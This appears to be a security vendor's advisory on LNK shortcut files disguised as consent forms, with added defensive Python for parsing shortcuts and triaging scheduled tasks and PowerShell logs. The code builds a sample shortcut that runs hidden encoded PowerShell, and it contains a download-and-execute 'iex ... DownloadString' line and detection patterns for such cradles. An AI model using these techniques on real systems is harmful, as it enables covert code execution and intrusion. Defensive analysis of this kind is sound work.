What is the true nature of the shortcut file I thought was a privacy consent form?


Malicious files posing as "Consent Forms for the Collection and Use of Personal Information" have recently been found in circulation. The threat actor uses file names that are easily mistaken for ordinary work documents to trick users into opening them. The files are not documents at all but Windows shortcut (LNK) files; when opened, they run hidden commands that collect information about the PC and can lead to further malicious activity.

In this article, we’ll examine how these malicious LNK files operate and how to respond safely.

In this case, the LNK file carries an obfuscated PowerShell script. When the user opens the shortcut, that script runs, downloads an additional PowerShell script from an external source, and executes it in a fileless manner: the downloaded code is decoded and run in memory without ever being written to disk, which leaves few artifacts for the user or file-based scanning to find.

[Figure 1] PowerShell script contained within the LNK file
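As an added example (not code from the article or from AhnLab), the following Python script shows what such a shortcut really contains by parsing the Shell Link structure directly rather than trusting its icon: the target it launches, its command-line arguments, whether the window is hidden, and whether extra data has been appended past the end of the structure, where a stub commonly stores what it later carves out. The shortcut it builds is constructed here; the use of `-EncodedCommand` and the trailing appended decoy are assumptions, since the page does not show the exact obfuscation the campaign uses.

```python
"""Parse a Windows Shell Link (.LNK) and report what it really launches.

Added example, not code from the article. The shortcut it builds is a
constructed stand-in for the malicious file described in the text; the
-EncodedCommand obfuscation and the payload appended after the structure
are assumptions, not details taken from the campaign.
"""
import base64
import struct

# CLSID 00021401-0000-0000-C000-000000000046 as stored on disk (Data1-3 little-endian)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in the order MS-SHLLINK stores them, keyed by their LinkFlags bit
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight


def _string_data(text):
    # CountCharacters (uint16) followed by the UTF-16LE characters, no terminator
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, arguments, icon_location, overlay=b""):
    """Build a minimal Unicode shortcut: target, arguments, icon, trailing data."""
    flags = 0x08 | 0x20 | 0x40 | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x80,
                         0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    strings = _string_data(relative_path) + _string_data(arguments) + _string_data(icon_location)
    terminal_block = b"\x00\x00\x00\x00"  # closes the (empty) ExtraData section
    return header + strings + terminal_block + overlay


def parse_lnk(data):
    """Walk the Shell Link structure; whatever lies past its end is returned as overlay."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = header_size
    if flags & HAS_ID_LIST:      # LinkTargetIDList: uint16 size, then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:    # LinkInfo: uint32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
        pos += width * count
    while pos + 4 <= len(data):  # ExtraData blocks: uint32 size each, size < 4 terminates
        size = struct.unpack_from("<I", data, pos)[0]
        pos += size if size >= 4 else 4
        if size < 4:
            break
    fields["show_command"] = show_command
    fields["overlay"] = data[pos:]
    return fields


def decode_encoded_command(arguments):
    """Plaintext of a -EncodedCommand value (base64 over UTF-16LE), or None."""
    tokens = arguments.split()
    for i, token in enumerate(tokens[:-1]):
        switch = token.lstrip("-/").lower()
        # powershell.exe accepts any unambiguous prefix: -e, -ec, -enc, -EncodedCommand
        if switch and "encodedcommand".startswith(switch):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(data):
    """Summarise the facts a responder wants before deciding what a shortcut is."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").lower()
    return {
        "target": info.get("relative_path", ""),
        "launches_powershell": target.endswith(("powershell.exe", "pwsh.exe")),
        "hidden_window": info["show_command"] == SW_SHOWMINNOACTIVE,
        "encoded_command": decode_encoded_command(info.get("arguments", "")),
        "overlay_size": len(info["overlay"]),
    }


# Constructed sample: a stub that carves a decoy document out of its own tail and opens it.
SAMPLE_SCRIPT = ("$b=[IO.File]::ReadAllBytes('consent.pdf.lnk');"
                 "[IO.File]::WriteAllBytes('consent.pdf',$b[-15..-1]);start consent.pdf")
SAMPLE_DECOY = b"%PDF-1.4 decoy!"  # 15 bytes standing in for an embedded document
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"),
    r"%SystemRoot%\System32\imageres.dll",  # document-style icon so it passes for a PDF
    overlay=SAMPLE_DECOY,
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LNK).items():
        print(f"{key}: {value}")
```

Run it on a real file with `triage(open(path, "rb").read())`; anything reported in the overlay deserves to be carved out and examined on its own. Reading the bytes directly also avoids handing the shortcut to the shell at all, which is safer than inspecting it through Explorer or the WScript.Shell COM object.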

Generation of Additional Scripts and Ensuring Persistence

The threat actor has also been observed modifying the external scripts several times. Although the six variants identified so far differ in their code, all of them use the same approach: decode an obfuscated PowerShell payload and execute it.

When the malicious LNK file is executed, two additional PowerShell scripts are written to specific paths on the user's PC. One acts as a downloader that retrieves external payloads; the other is a loader whose only job is to run the downloader.

[Figure 2] Additional PowerShell script_1

[Figure 3] Additional PowerShell script_2

The threat actor then registers a task in Windows Task Scheduler so that the loader script runs repeatedly. Task Scheduler is a legitimate feature for running programs at set times or under specific conditions, but when abused by a threat actor it lets the malicious behavior resume after every reboot or logon without any further action by the user.

The malicious LNK file also drops and opens a decoy: a legitimate-looking document embedded inside the shortcut, shown to the user so that nothing appears out of the ordinary. Because a document opens as expected, the user has little reason to suspect an infection. The original LNK file is then deleted, removing the most obvious evidence of how the infection began.

[Figure 4] Legitimate decoy document

Additional malicious files identified in the download path

Two main types of additional malicious files were identified at the confirmed download path: a PowerShell script that steals information from the infected PC, and a PowerShell script that acts as a backdoor loader.

The downloader script fetches data stored on a legitimate web service, extracts the encoded payload embedded in that data, and executes it. Because the threat actor can change the hosted data at any time, the malware that ultimately runs can vary even when the distribution method is identical, so detection should key on the delivery chain (the LNK, the dropped scripts, the scheduled task) rather than on any single final payload.

The information theft script follows the same pattern seen in past Kimsuky group cases, and in this case too the threat actor was found to use an external service.

Information Theft and Backdoor Behavior

The information theft PowerShell script collects a range of data from the infected PC: installed security products, operating system details, network configuration, IP addresses, drive information, recently modified files, and running processes.
The threat actor uses this data to profile the environment, for example to determine whether security software is present, how the host is connected to the network, and whether further attacks are feasible.

[Figure 5] Information Theft PowerShell script

The backdoor loader script decrypts an embedded executable and loads it directly into memory. The loaded malware then operates as a backdoor capable of, among other things, stealing information and executing DLLs (dynamic link libraries).

A backdoor is malware that lets an attacker regain access to the infected PC and issue further commands. An attack of this kind therefore does not end with information gathering; it can lead to follow-up attacks, which is why it must be treated with caution.

[Figure 6] Backdoor Malware

Countermeasures

This attack begins when a user opens an LNK file believing it to be a document, so checking a file before opening it is the most important defense. In corporate environments, checks should extend beyond files from suspicious sources to Task Scheduler activity, PowerShell execution logs, and outbound connection logs.

1) Avoid executing files from unknown sources

Even if a file looks like a document, a '.LNK' extension means it is a Windows shortcut, not a document, regardless of the icon it shows. Note that Windows Explorer hides the .lnk extension even when extensions for known file types are set to be displayed, so the reliable check is the file's Type in its Properties dialog: a shortcut is listed as "Shortcut" and has a Shortcut tab that reveals its real target and arguments. Do not open such a file if you did not expect to receive a shortcut.

2) Verify the file extension and delivery path before opening a file

For files received by email, instant messaging, or from websites, first verify the sender and the route by which the file arrived. Files whose names look familiar in a work context, such as a consent form, are exactly what threat actors exploit.

3) Check the Task Scheduler and Suspicious Files

Corporate security administrators should check whether suspicious Task Scheduler entries have been registered on the organization's PCs, in particular tasks that launch PowerShell with hidden-window or execution-policy-bypass options, or that point at scripts under user profile paths. They should also check for abnormal PowerShell scripts or unknown files created under user account paths.

4) Verify PowerShell Execution and External Access Logs

Check PowerShell execution logs, traces of external connections, and whether any script is running repeatedly. Script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records the code that actually ran, including stages that were decoded in memory, which makes it the most useful source for fileless activity of this kind. Even connections to what appear to be legitimate web services or cloud storage can be used to deliver malicious data, so look for connection patterns that deviate from the norm.
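The following Python script is an added example (not code from the article or from AhnLab) that turns the scheduled-task persistence described earlier and countermeasures 3) and 4) into offline triage logic. It reads task definitions in the XML format Windows keeps under %SystemRoot%\System32\Tasks (also what `schtasks /Query /TN <name> /XML` prints) and records shaped like event 4104 from the Microsoft-Windows-PowerShell/Operational log, flags the command-line and script traits that match this campaign's tradecraft, and counts how often each script file has run. The task names, paths, URL and log records are constructed for the example; the detection labels and thresholds are our own choices, not an AhnLab signature.

```python
r"""Offline triage of Task Scheduler definitions and PowerShell script-block logs.

Added example, not code from the article. Inputs are constructed stand-ins:
a task definition as stored under %SystemRoot%\System32\Tasks and records
shaped like event 4104 (ScriptBlockText plus the script Path). Task names,
paths and URLs are invented; the labels and thresholds are our own.
"""
import re
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Traits of a command line or script body worth flagging; the labels are ours
SUSPICIOUS = (
    (r"(?i)\b(powershell|pwsh)(\.exe)?\b", "launches PowerShell"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-e(xecutionpolicy|p)\s+bypass", "execution policy bypass"),
    (r"(?i)-e(nc(odedcommand)?|c)?\s+[A-Za-z0-9+/=]{16,}", "encoded command"),
    (r"(?i)(%appdata%|%localappdata%|%temp%|\\users\\[^\\]+\\appdata\\)",
     "script under a user-writable path"),
    (r"(?i)(net\.webclient|downloadstring|downloaddata|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b)",
     "downloads from the network"),
    (r"(?i)(invoke-expression|\biex\b|frombase64string)", "decodes or evaluates code at runtime"),
)


def _matches(text):
    return [label for pattern, label in SUSPICIOUS if re.search(pattern, text)]


def triage_task(xml_text):
    """Return the persistence traits and suspicious traits of one task definition."""
    root = ET.fromstring(xml_text)
    persistence = []
    if root.find(".//t:Repetition/t:Interval", NS) is not None:
        persistence.append("repeats on an interval")
    if root.find(".//t:LogonTrigger", NS) is not None or root.find(".//t:BootTrigger", NS) is not None:
        persistence.append("re-runs at logon or boot")
    actions, findings = [], []
    for action in root.findall(".//t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", "", NS).strip()
        arguments = action.findtext("t:Arguments", "", NS).strip()
        actions.append(f"{command} {arguments}".strip())
        findings += _matches(actions[-1])
    return {"uri": root.findtext(".//t:URI", "", NS), "actions": actions,
            "persistence": persistence, "findings": list(dict.fromkeys(findings))}


def triage_script_blocks(events, repeat_threshold=3):
    """events: dicts with 'path' and 'script' as recovered from 4104 records."""
    runs = Counter(event.get("path") or "<no file>" for event in events)
    flagged = [{"path": event.get("path"), "labels": _matches(event["script"])}
               for event in events if _matches(event["script"])]
    repeated = {path: n for path, n in runs.items() if n >= repeat_threshold}
    return {"repeated": repeated, "flagged": flagged}


# Constructed task imitating the loader persistence described in the text (name invented)
MALICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\OneDriveStandaloneUpdater</URI></RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <Repetition><Interval>PT30M</Interval></Repetition>
    </LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\loader.ps1"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for contrast, modelled on a stock Windows time-sync task
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Time Synchronization\SynchronizeTime</URI></RegistrationInfo>
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="LocalService">
    <Exec><Command>%windir%\system32\sc.exe</Command><Arguments>start w32time task_started</Arguments></Exec>
  </Actions>
</Task>"""

LOADER = r"C:\Users\user\AppData\Roaming\Microsoft\loader.ps1"
DOWNLOAD_LINE = "iex (New-Object Net.WebClient).DownloadString('https://example.com/d/notes.txt')"
SAMPLE_EVENTS = [  # constructed 4104-style records: the loader fired three times, plus one benign script
    {"path": LOADER, "script": DOWNLOAD_LINE},
    {"path": LOADER, "script": DOWNLOAD_LINE},
    {"path": LOADER, "script": DOWNLOAD_LINE},
    {"path": r"C:\Scripts\rotate.ps1", "script": "Get-ChildItem C:\\Logs -Filter *.log | Measure-Object"},
]

if __name__ == "__main__":
    for xml_text in (MALICIOUS_TASK_XML, BENIGN_TASK_XML):
        print(triage_task(xml_text))
    print(triage_script_blocks(SAMPLE_EVENTS))
```

On a live host the task files can be read straight from the Tasks directory (they are UTF-16 XML, so pass the bytes to `ET.parse` rather than decoding first), and 4104 records can be exported with `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}` or `wevtutil`. A task that both persists and shows several of these traits, together with the same script path appearing over and over in the script-block log, is the combination the text describes.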

Related IOCs and the detailed analysis are available to AhnLab TIP subscribers.